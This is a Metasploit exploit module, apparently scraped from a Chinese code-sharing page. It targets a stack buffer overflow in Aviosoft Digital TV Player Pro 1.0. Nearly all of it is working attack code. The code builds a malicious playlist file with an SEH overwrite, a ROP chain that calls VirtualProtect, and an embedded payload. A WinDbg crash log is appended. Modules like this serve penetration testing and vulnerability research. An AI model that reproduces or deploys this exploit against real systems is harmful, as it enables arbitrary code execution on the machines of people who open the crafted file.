扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 |
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT def initialize(info={}) super(update_info(info, 'Name' => "Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow", 'Description'=> %q{ This module exploits a vulnerability found in Aviosoft Digital TV Player Pro version 1.x.An overflow occurs when the process copies the content of a playlist file on to the stack, which may result aribitrary code execution under the context of the user. }, 'License'=> MSF_LICENSE, 'Author' => [ 'modpr0be',#Initial discovery, poc 'sinn3r',#Metasploit ], 'References' => [ ['OSVDB', '77043'], ['URL', 'http://www.exploit-db.com/exploits/18096/'], ], 'Payload'=> { 'BadChars' => "\x00\x0a\x1a", 'StackAdjustment' => -3500, }, 'DefaultOptions'=> { 'ExitFunction' => "seh", }, 'Platform' => 'win', 'Targets'=> [ [ 'Aviosoft DTV Player 1.0.1.2', { 'Ret'=> 0x6130534a,#Stack pivot (ADD ESP,800; RET) 'Offset' => 612, #Offset to SEH 'Max'=> 5000 #Max buffer size } ], ], 'Privileged' => false, 'DisclosureDate' => "Nov 9 2011", 'DefaultTarget'=> 0)) register_options( [ OptString.new('FILENAME', [false, 'The playlist name', 'msf.plf']) ], self.class) end def junk(n=1) return [rand_text_alpha(4).unpack("L")[0]] * n end def nops(rop=false, n=1) return rop ? [0x61326003] * n : [0x90909090] * n end def exploit rop = [ nops(true, 10),#ROP NOP 0x6405347a,#POP EDX # RETN (MediaPlayerCtrl.dll) 0x10011108,#ptr to &VirtualProtect 0x64010503,#PUSH EDX # POP EAX # POP ESI # RETN (MediaPlayerCtrl.dll) junk, 0x6160949f,#MOV ECX,DWORD PTR DS:[EDX] # POP ESI (EPG.dll) junk(3), 0x61604218,#PUSH ECX # ADD AL,5F # XOR EAX,EAX # POP ESI # RETN 0C (EPG.dll) junk(3), 0x6403d1a6,#POP EBP # RETN (MediaPlayerCtrl.dll) junk(3), 0x60333560,#& push esp #ret 0c (Configuration.dll) 0x61323EA8,#POP EAX # RETN (DTVDeviceManager.dll) 0xA13977DF,#0x00000343-> ebx 0x640203fc,#ADD EAX,5EC68B64 # RETN (MediaPlayerCtrl.dll) 0x6163d37b,#PUSH EAX # ADD AL,5E # POP EBX # RETN (EPG.dll) 0x61626807,#XOR EAX,EAX # RETN (EPG.dll) 0x640203fc,#ADD EAX,5EC68B64 # RETN (MediaPlayerCtrl.dll) 0x6405347a,#POP EDX # RETN (MediaPlayerCtrl.dll) 0xA13974DC,#0x00000040-> edx 0x613107fb,#ADD EDX,EAX # MOV EAX,EDX # RETN (DTVDeviceManager.dll) 0x60326803,#POP ECX # RETN (Configuration.dll) 0x60350340,#&Writable location 0x61329e07,#POP EDI # RETN (DTVDeviceManager.dll) nops(true),#ROP NOP 0x60340178,#POP EAX # RETN nops,#Regular NOPs 0x60322e02 #PUSH # RETN ].flatten.pack("V*") buf= '' buf << rand_text_alpha(target['Offset']-buf.length) buf << [target.ret].pack('V*') buf << rand_text_alpha(136) buf << rop buf << make_nops(32) buf << payload.encoded buf << rand_text_alpha(target['Max']-buf.length) file_create(buf) end end =begin eax=00001779 ebx=047a02c0 ecx=000001f4 edx=047a6814 esi=047a77bc edi=00130000 eip=6400f6f0 esp=0012f038 ebp=00000001 iopl=0 nv up ei pl nz na pe nc cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010206 MediaPlayerCtrl!DllCreateObject+0x220: 6400f6f0 f3a5rep movs dword ptr es:[edi],dword ptr [esi] 0:000> !exchain 0012f3bc: *** WARNING: Unable to verify checksum for C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\DTVDeviceManager.dll *** ERROR: Symbol file could not be found.Defaulted to export symbols for C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\DTVDeviceManager.dll - DTVDeviceManager+534a (6130534a) Invalid exception stack at 41414141 0:000> !address edi 00130000 : 00130000 - 00003000 Type 00040000 MEM_MAPPED Protect00000002 PAGE_READONLY State00001000 MEM_COMMIT UsageRegionUsageIsVAD 0:000> !address esi 047a0000 : 047a0000 - 0000b000 Type 00020000 MEM_PRIVATE Protect00000004 PAGE_READWRITE State00001000 MEM_COMMIT UsageRegionUsageHeap Handle 013c0000 =end |
体验盒子
